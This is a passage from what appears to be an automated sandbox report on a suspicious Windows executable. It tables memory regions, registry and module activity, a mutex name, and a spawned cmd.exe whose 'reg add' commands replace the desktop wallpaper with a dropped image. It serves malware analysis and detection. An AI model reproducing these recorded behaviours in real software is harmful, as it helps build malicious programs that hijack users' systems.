| private_0x0000000003a20000 | 0x03a20000 | 0x03b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b20000 | 0x03b20000 | 0x03b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b60000 | 0x03b60000 | 0x03c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c60000 | 0x03c60000 | 0x03c9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003ca0000 | 0x03ca0000 | 0x03d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003da0000 | 0x03da0000 | 0x03ddffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003de0000 | 0x03de0000 | 0x03edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003ee0000 | 0x03ee0000 | 0x03f1ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x74640000 | 0x74652fff | Memory Mapped File | rwx |
|
|
|
- |
| pnrpnsp.dll | 0x74660000 | 0x74675fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x746b0000 | 0x746b7fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x746c0000 | 0x74705fff | Memory Mapped File | rwx |
|
|
|
- |
| winrnr.dll | 0x74710000 | 0x7471afff | Memory Mapped File | rwx |
|
|
|
- |
| napinsp.dll | 0x74720000 | 0x74731fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x74740000 | 0x74747fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74750000 | 0x7477ffff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x74780000 | 0x74803fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x74810000 | 0x7485dfff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x74860000 | 0x7487bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74880000 | 0x7489afff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x748a0000 | 0x748a9fff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x748b0000 | 0x748bffff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x748c0000 | 0x748d2fff | Memory Mapped File | rwx |
|
|
|
- |
| wsock32.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74990000 | 0x74a20fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x74ac0000 | 0x74ac6fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76ce0000 | 0x76d71fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76ed0000 | 0x76f2bfff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76f30000 | 0x77019fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007fe6e000 | 0x7fe6e000 | 0x7fe70fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe71000 | 0x7fe71000 | 0x7fe73fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe74000 | 0x7fe74000 | 0x7fe76fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe77000 | 0x7fe77000 | 0x7fe79fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe7a000 | 0x7fe7a000 | 0x7fe7cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe7d000 | 0x7fe7d000 | 0x7fe7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe80000 | 0x7fe80000 | 0x7fe82fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe83000 | 0x7fe83000 | 0x7fe85fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe86000 | 0x7fe86000 | 0x7fe88fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe89000 | 0x7fe89000 | 0x7fe8bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe8c000 | 0x7fe8c000 | 0x7fe8efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe8f000 | 0x7fe8f000 | 0x7fe91fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe92000 | 0x7fe92000 | 0x7fe94fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe95000 | 0x7fe95000 | 0x7fe97fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe98000 | 0x7fe98000 | 0x7fe9afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe9b000 | 0x7fe9b000 | 0x7fe9dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe9e000 | 0x7fe9e000 | 0x7fea0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fea1000 | 0x7fea1000 | 0x7fea3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fea4000 | 0x7fea4000 | 0x7fea6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fea7000 | 0x7fea7000 | 0x7fea9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007feaa000 | 0x7feaa000 | 0x7feacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fead000 | 0x7fead000 | 0x7feaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd5000 | 0x7ffd5000 | 0x7ffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 127 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
File (300)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | -n | type = file_attributes |
|
5 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 14 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 15 |
|
9 | |
| Write | STD_OUTPUT_HANDLE | size = 16 |
|
89 | |
| Write | STD_OUTPUT_HANDLE | size = 17 |
|
137 | |
| Write | STD_OUTPUT_HANDLE | size = 34 |
|
7 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 68 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 102 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 119 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 128 |
|
36 | |
| Write | STD_OUTPUT_HANDLE | size = 8 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 20 |
|
1 |
Registry (12)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Embarcadero\Locales | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Embarcadero\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\CodeGear\Locales | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\CodeGear\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | - |
|
2 |
Module (93)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x75130000 |
|
1 | |
| Load | ws2_32.dll | base_address = 0x76ed0000 |
|
1 | |
| Get Handle | c:\users\ciihmnxmn6ps\desktop\nwypdmno.exe | base_address = 0x400000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
6 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x76ce0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x76f30000 |
|
1 | |
| Get Filename | c:\users\ciihmnxmn6ps\desktop\nwypdmno.exe | process_name = c:\users\ciihmnxmn6ps\desktop\nwypdmno.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\NWYpDmnO.exe, size = 522 |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\nwypdmno.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\NWYpDmnO.exe, size = 261 |
|
3 | |
| Get Filename | c:\users\ciihmnxmn6ps\desktop\nwypdmno.exe | process_name = c:\users\ciihmnxmn6ps\desktop\nwypdmno.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\NWYpDmnO.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadPreferredUILanguages, address_out = 0x751495e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadPreferredUILanguages, address_out = 0x75149a20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadUILanguage, address_out = 0x7514d980 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x7514a410 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDiskFreeSpaceExW, address_out = 0x751562d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
2 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantChangeTypeEx, address_out = 0x76cf7e70 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNeg, address_out = 0x76d40400 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNot, address_out = 0x76d41670 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAdd, address_out = 0x76d18460 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarSub, address_out = 0x76d19960 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMul, address_out = 0x76d19090 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDiv, address_out = 0x76d40910 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarIdiv, address_out = 0x76d412b0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMod, address_out = 0x76d41510 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAnd, address_out = 0x76d0f9d0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarOr, address_out = 0x76d41720 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarXor, address_out = 0x76d418c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCmp, address_out = 0x76d04040 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarI4FromStr, address_out = 0x76d04b50 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR4FromStr, address_out = 0x76d0f4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR8FromStr, address_out = 0x76d11740 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDateFromStr, address_out = 0x76d05a80 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCyFromStr, address_out = 0x76d42e50 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBoolFromStr, address_out = 0x76d020d0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromCy, address_out = 0x76d05240 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromDate, address_out = 0x76d05420 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromBool, address_out = 0x76d02080 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstanceEx, address_out = 0x7503baf0 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x74fdcd50 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoAddRefServerProcess, address_out = 0x7503d120 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoReleaseServerProcess, address_out = 0x75041970 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoResumeClassObjects, address_out = 0x75046640 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoSuspendClassObjects, address_out = 0x74fb1f60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeConditionVariable, address_out = 0x779e9da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeConditionVariable, address_out = 0x779f5860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeAllConditionVariable, address_out = 0x779f3370 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableCS, address_out = 0x74e62850 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAIoctl, address_out = 0x76eddca0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = __WSAFDIsSet, address_out = 0x76ee2f20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = closesocket, address_out = 0x76ed9ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ioctlsocket, address_out = 0x76edd860 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAGetLastError, address_out = 0x76ee38d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAStartup, address_out = 0x76ee2420 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSACleanup, address_out = 0x76edda00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = accept, address_out = 0x76ee4030 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = bind, address_out = 0x76ede0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = connect, address_out = 0x76ee33a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getpeername, address_out = 0x76ee12c0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getsockname, address_out = 0x76ede030 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getsockopt, address_out = 0x76ee1180 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = htonl, address_out = 0x76ee3670 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = htons, address_out = 0x76ee3650 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = inet_addr, address_out = 0x76ee2e90 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = inet_ntoa, address_out = 0x76ee4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = listen, address_out = 0x76ee3f40 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ntohl, address_out = 0x76ee3670 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ntohs, address_out = 0x76ee3650 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = recv, address_out = 0x76edcff0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = recvfrom, address_out = 0x76ee4d60 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = select, address_out = 0x76ee48e0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = send, address_out = 0x76edce20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = sendto, address_out = 0x76ee15a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = setsockopt, address_out = 0x76ed9560 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = shutdown, address_out = 0x76ee14e0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = socket, address_out = 0x76ed9780 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostbyaddr, address_out = 0x76efc600 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostbyname, address_out = 0x76efc790 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getprotobyname, address_out = 0x76efb6d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getprotobynumber, address_out = 0x76efb820 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getservbyname, address_out = 0x76efcad0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getservbyport, address_out = 0x76efccb0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostname, address_out = 0x76efc920 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getaddrinfo, address_out = 0x76ed52b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = freeaddrinfo, address_out = 0x76ed4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getnameinfo, address_out = 0x76ee16a0 |
|
1 |
System (143)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
64 | |
| Sleep | duration = -1 (infinite) |
|
1 | |
| Get Time | type = Ticks, time = 133953 |
|
2 | |
| Get Time | type = Local Time, time = 2018-10-03 13:05:03 (Local Time) |
|
4 | |
| Get Time | type = Ticks, time = 133968 |
|
1 | |
| Get Time | type = Local Time, time = 2018-10-03 13:07:57 (Local Time) |
|
64 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Hardware Information |
|
2 | |
| Get Info | type = Operating System |
|
3 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MutexEMANDONW |
|
1 | |
| Open | mutex_name = MutexEMANDONW, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 |
Network Behavior
DNS (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Hostname | name_out = LHnIwsj |
|
1 | |
| Resolve Name | host = LHnIwsj, address_out = 192.168.0.96 |
|
1 |
Process #7: cmd.exe
75
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\F7t5Hk0D.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:15, Reason: Child Process |
| Unmonitor | End Time: 00:03:26, Reason: Self Terminated |
| Monitor Duration | 00:00:11 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf9c |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FA0
0x
FF0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000fd0000 | 0x00fd0000 | 0x00feffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000fd0000 | 0x00fd0000 | 0x00fdffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000fe0000 | 0x00fe0000 | 0x00fe3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ff0000 | 0x00ff0000 | 0x00ff1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ff0000 | 0x00ff0000 | 0x00ff3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001000000 | 0x01000000 | 0x01013fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001020000 | 0x01020000 | 0x0105ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001060000 | 0x01060000 | 0x0115ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001160000 | 0x01160000 | 0x01163fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001170000 | 0x01170000 | 0x01170fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001180000 | 0x01180000 | 0x01181fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000011c0000 | 0x011c0000 | 0x011cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x012fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x01300000 | 0x013bdfff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005420000 | 0x05420000 | 0x0545ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005460000 | 0x05460000 | 0x0555ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005690000 | 0x05690000 | 0x0569ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x056a0000 | 0x059d6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ed10000 | 0x7ed10000 | 0x7ee0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ee10000 | 0x7ee10000 | 0x7ee32fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ee36000 | 0x7ee36000 | 0x7ee36fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee39000 | 0x7ee39000 | 0x7ee3bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee3c000 | 0x7ee3c000 | 0x7ee3efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee3f000 | 0x7ee3f000 | 0x7ee3ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 248, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
